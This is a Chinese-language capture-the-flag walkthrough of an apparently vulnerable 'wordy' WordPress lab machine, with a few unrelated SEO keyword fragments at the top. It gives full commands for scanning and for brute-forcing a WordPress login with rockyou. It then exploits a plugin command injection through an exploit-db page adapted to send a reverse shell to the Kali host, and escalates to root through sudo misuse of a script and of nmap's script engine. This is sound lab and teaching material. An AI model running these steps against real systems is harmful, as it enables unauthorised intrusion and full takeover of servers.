企业手机网站建设资讯,韩国网站如何切换中文,网站建设外出考察信息,网站建设的基本技术步骤一、准备工作
kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09;
1.靶场环境
下载链接: 百度网盘 请输入提取码 提取码: bazx
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip 命令#xff1a;sudo arp-scan -l 二、信息收集
1.nmap的信息收集
#…一、准备工作
kali和靶机都选择NAT模式kali与靶机同网段
1.靶场环境
下载链接: 百度网盘 请输入提取码 提取码: bazx
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip 命令sudo arp-scan -l 二、信息收集
1.nmap的信息收集
1扫描靶机开放的端口及其服务 nmap -sV -p- 192.168.101.119 2看看详细信息 nmap -A -p- 192.168.101.119 2.网站的信息收集
1访问靶机的网站
1.先从80端口寻找突破口访问一下http://192.168.101.119 ,发现URL栏写的不是靶机的ip而是http://wordy/而很明显DNS没有解析出来 2.回过头来注意到nmap扫描时有这样一个提示基本可以确认需要手动配置hosts文件 2配置hosts文件
1.sudo vim /etc/hosts 在文件添加192.168.101.115靶机ip wordy 2.再次访问http://192.168.101.115
没有发现啥有用信息只是知道这个是一个WordPress网站 3用wpscan工具看看这个靶机网站有什么用户 wpscan --url http://wordy --enumerate u 发现了几个用户 4用dirb扫描看看网站的后台登录是哪个网址 dirb http://wordy 1.打开http://wordy/wp-admin/ 发现登录网址
5wpscan字典爆破
1.在桌面创建一个wordy-pass1.dic文件 2.将rockyou.txt里面的密码复制到wordy-pass1.dic cd /usr/share/wordlists/ ls cp rockyou.txt /home/kali/桌面/wordy-pass1.dic 3.将刚才得到的用户放在文件user.txt vim user.txt cat user.txt 3.使用wpscan进行密码爆破
常规的方法跑太费时间把一部分密码拿出来跑 cat /usr/share/wordlists/rockyou.txt | grep k01 wordy-pass1.dic wpscan --ignore-main-redirect --url http://wordy -U user.txt -P wordy-pass1.dic --force 得出Username: mark, Password: helpdesk01 用爆破出来的用户密码登录 成功登录到网站后台 6使用mark用户登录后台发现一个插件Activity monitor猜测这个插件存在漏洞 1.searchsploitg工具查看Activity monitor漏洞 searchsploit Activity monitor 发现是命令注入漏洞
1修改html代码action跳转及shell反弹IP地址到kali本机 cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html cp 45274.html 45274.html.bak vim 45274.html 2Kali临时开启HTTP服务并访问45274.html页面 python -m SimpleHTTPServer 80 同时在kali终端这边开启监听9999端口在页面点击submit request后反弹shell成功
3优化命令执行终端执行下面命令进入python交互式(注意要下载python环境才能运行): python -c ‘import pty;pty.spawn(“/bin/bash”)’ 三、提权
1. 进入到mark用户的家目录下stuff文件下有一个things-to-do.txt文件查看文件内容发现graham用户及登录密码 cd /home/mark/stuff ls cat things-to-do.txt 2.用得到的用户密码ssh远程登录 ssh graham192.168.101.119 3. graham用户成功登录后查看当前用户可以执行的操作 sudo -l 发现可以运行jens用户下面的backups.sh
4.查看backups.sh cd /home/jens ls cat backups.sh 5. 在backups.sh文件中写入/bin/bash并以jens用户去执行该脚本 echo /bin/bash backups.sh sudo -u jens ./backups.sh 6.获得jens用户权限时查看jens用户可执行的操作 sudo -l 发现jens用户可以在无密码状态下使用nmap命令
7. 发现flag
写入一条命令到getShell并通过nmap运行getShell成功进入root用户在/root目录下找到theflag.txt文件 echo os.execute(/bin/sh) getShell sudo nmap --scriptgetShell cd /root cat theflag.txt